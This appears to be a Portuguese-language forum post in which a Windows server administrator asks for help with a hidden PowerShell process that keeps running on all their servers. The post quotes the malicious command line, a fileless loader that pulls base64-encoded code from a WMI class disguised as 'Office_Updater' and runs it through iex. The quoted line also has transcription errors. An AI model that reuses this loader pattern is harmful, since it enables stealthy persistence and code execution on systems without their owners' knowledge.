Nos últimos dias venho tendo problemas com o PowerShell, em todos meus servidores Windows o PowerShel está subindo e executando algum script que n consegui localizar e nem impedir sua execução. Pelo Process Explorer consigo visualizar o seguinte comando
sendo executado.
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - NoP -Nonl -W Hidden "$mon = ([WmiClass]'root\default:Office_Updater').Properties['mon'].Value:$funs=([WmiClass]'root\default:Office_Updater').Properties['fun'].Value;iex([System.Text.Encoding]::ASCll.GetString([System.Convert]::FromBase64String($fun))):Invoke-Command
- ScriptBlock $RemoteScript -ArgumentList @($mon, $mon, 'Void',0,",")"
Desde já agradeço a ajuda de todos.
